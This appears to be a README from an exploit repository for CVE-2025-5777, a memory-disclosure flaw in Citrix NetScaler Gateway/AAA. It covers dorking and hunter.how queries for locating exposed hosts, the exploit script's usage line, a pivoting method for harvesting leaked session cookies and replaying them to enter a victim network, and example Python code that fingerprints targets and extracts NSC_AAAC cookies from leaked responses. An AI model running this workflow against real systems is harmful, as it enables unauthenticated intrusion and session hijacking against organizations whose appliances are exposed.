ndr-repo/CVE-2025-5777
Exploit for CVE-2025-5777: Citrix NetScaler Memory Disclosure (CitrixBleed 2) [T1606]

Description

  • External, unauthenticated memory-disclosure exploit for Citrix NetScaler ADC/Gateway instances configured as a Gateway (VPN virtual server) or as an AAA virtual server
  • Leverages insufficient input validation in the authentication web app to trigger a memory overread, then races the server's own processing (TOCTOU) by repeating the request to scrape whatever variables are resident in the leaked region at that moment; each response only returns what happens to be there, so many requests are needed

Asset Discovery & Exposure Analysis - (Red/Purple Team -> Organization)

Method 1: Search Engine Dorking

site:<targetDomainSuffix> intitle:"Netscaler AAA" | intitle:"Citrix Gateway"

Method 2: Hunter.how

domain.suffix=="<targetDomainSuffix>" and header.server="snow_adc"
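Both discovery methods key on two indicators: the `snow_adc` value in the `Server` header and a login page whose title reads "Citrix Gateway" or "Netscaler AAA". The script below is an added example (not the repository's exploit script) that applies those same two checks offline to raw HTTP responses, so a list of hosts pulled from a search engine or hunter.how can be re-verified from saved responses before anything is fired at them. The three sample responses are constructed, not captured traffic.

```python
"""Offline re-check of the NetScaler indicators used in the discovery section.

Added example, not part of the repository. It classifies a raw HTTP/1.1
response by the two signals the README relies on: a Server header of
'snow_adc' and a login-page <title> of 'Citrix Gateway' or 'Netscaler AAA'.
"""
import re
from typing import Dict, List, Tuple

TITLE_RE = re.compile(r"<title>\s*(.*?)\s*</title>", re.IGNORECASE | re.DOTALL)
KNOWN_TITLES = ("citrix gateway", "netscaler aaa")  # from the dork in Method 1
KNOWN_SERVER = "snow_adc"                           # from the hunter.how query


def parse_response(raw: bytes) -> Tuple[Dict[str, str], str]:
    """Split a raw HTTP response into a lower-cased header map and a body string."""
    head, _, body = raw.partition(b"\r\n\r\n")
    headers: Dict[str, str] = {}
    for line in head.split(b"\r\n")[1:]:  # index 0 is the status line
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return headers, body.decode("utf-8", "replace")


def fingerprint(raw: bytes) -> Dict[str, object]:
    """Return whether the response matches the NetScaler indicators and why.

    Two independent signals are checked so a host that hides its Server header
    but still serves the stock login page is not missed, and vice versa.
    """
    headers, body = parse_response(raw)
    server = headers.get("server", "")
    match = TITLE_RE.search(body)
    title = match.group(1) if match else ""
    evidence: List[str] = []
    if server.lower() == KNOWN_SERVER:
        evidence.append("server:" + server)
    if any(known in title.lower() for known in KNOWN_TITLES):
        evidence.append("title:" + title)
    return {"netscaler": bool(evidence), "evidence": evidence}


# Constructed sample responses (not captured from any real host).
SAMPLE_NETSCALER = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: snow_adc\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html><head><title>Citrix Gateway</title></head><body></body></html>"
)
SAMPLE_OTHER = (
    b"HTTP/1.1 200 OK\r\nServer: nginx\r\n\r\n"
    b"<html><head><title>Welcome</title></head></html>"
)
SAMPLE_TITLE_ONLY = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><head><title>Citrix Gateway</title></head></html>"
)

if __name__ == "__main__":
    for label, sample in (("netscaler", SAMPLE_NETSCALER), ("other", SAMPLE_OTHER),
                          ("title-only", SAMPLE_TITLE_ONLY)):
        print(label, fingerprint(sample))
```

A match only says the host serves a NetScaler Gateway/AAA login page; it says nothing about whether the running build is affected by CVE-2025-5777. Confirm the version against the fixed builds in Citrix's advisory for this CVE before counting a host as exposed.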

Exploit Usage

bash CVE-2025-5777.sh <targetDomain>

Pivoting - Red Team Operations

Objective - Start external and unauthenticated, end inside the network by replaying a leaked low-privilege user session over the Gateway VPN

Methodology

  • Inspect the leaked bytes in each response body; try decoding and unescaping them to recover readable fragments (log lines, paths, configuration values) that give visibility into the asset
  • Inspect each response (headers and body) and repeat the request until an active user's session cookie turns up in the leaked region. Each response returns only what happens to be resident at that moment, so collect and deduplicate across many requests. Horizon3.ai published a demonstration of this step.
  • Replay the captured session cookie against the target Gateway to inherit that user's authenticated session. A leaked session stays usable until it expires or is terminated, so it does not disappear merely because the appliance is patched.
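The first two steps above are a triage loop: undo whatever encoding the server applied when it echoed raw memory, pull out the readable fragments, and keep going until a session cookie appears. The following is an added example of that loop (it is not the repository's script and does not send any requests). It assumes the leaked bytes come back inside an escaped XML element, which is given the placeholder name `<data>` here, and that the NetScaler AAA session cookie is named `NSC_AAAC`; the README itself only says "session cookies", so both are assumptions. All four response bodies are constructed.

```python
"""Triage of memory-disclosure responses, as described in the pivoting section.

Added example, not the repository's code. Assumptions (none stated on the page):
  * the leak is returned inside an XML/HTML-escaped element, named <data> here;
  * the AAA session cookie is called NSC_AAAC and its value is URL-safe text.
"""
import html
import re
from typing import Dict, Iterable, List

# Assumed cookie name and value charset; the README only says "session cookies".
SESSION_COOKIE_RE = re.compile(r"NSC_AAAC=([A-Za-z0-9+/_-]{16,})")


def decode_leak(body: str, element: str = "data") -> bytes:
    """Pull the leaked chunk out of its wrapper element and undo XML escaping.

    Leaked bytes that happen to be '<', '>', '&' or '"' come back as entities,
    so a string containing them is only readable after unescaping.
    """
    m = re.search(r"<%s>(.*?)</%s>" % (element, element), body, re.DOTALL)
    inner = m.group(1) if m else body
    return html.unescape(inner).encode("latin-1", "replace")


def extract_strings(blob: bytes, min_len: int = 6) -> List[str]:
    """Return printable ASCII runs, as `strings` would, for manual review."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group(0).decode("ascii") for m in pattern.finditer(blob)]


def harvest(responses: Iterable[str]) -> Dict[str, List[str]]:
    """Accumulate unique findings across many responses.

    Each response returns only what was resident in the over-read region at
    that moment, so the same cookie may show up repeatedly or not at all;
    results are deduplicated in order of first appearance.
    """
    cookies: List[str] = []
    strings: List[str] = []
    for body in responses:
        blob = decode_leak(body)
        for s in extract_strings(blob):
            if s not in strings:
                strings.append(s)
        for m in SESSION_COOKIE_RE.finditer(blob.decode("latin-1")):
            if m.group(0) not in cookies:
                cookies.append(m.group(0))
    return {"session_cookies": cookies, "strings": strings}


# Constructed response bodies (not captured traffic). The control bytes stand in
# for the binary noise that surrounds anything useful in a real leak.
SAMPLE_RESPONSES = [
    "<data>\x00\x00\x01\x7f&lt;request id=1&gt;\x00\x02/var/log/app.log\x00\x00</data>",
    "<data>\x00\x00NSC_AAAC=c3e1a9f04b7d2e15a6b8&amp;\x00\x05\x00</data>",
    "<data>\x00\x00NSC_AAAC=c3e1a9f04b7d2e15a6b8&amp;\x00\x05\x00</data>",  # repeat
    "<data>\x03user=jsmith\x00NSC_AAAC=9f0b1c2d3e4f5a6b7c8d9e\x00</data>",
]

if __name__ == "__main__":
    found = harvest(SAMPLE_RESPONSES)
    for cookie in found["session_cookies"]:
        print("session cookie:", cookie)
    for s in found["strings"]:
        print("string:", s)
```

In practice the loop would feed `harvest` one response body per request until `session_cookies` is non-empty; the cookie name, the wrapper element and the minimum string length are the knobs to adjust once real responses are in hand.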
